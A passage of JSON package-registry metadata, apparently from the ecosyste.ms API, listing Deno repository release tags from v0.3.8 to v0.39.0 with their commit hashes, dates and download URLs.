038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifes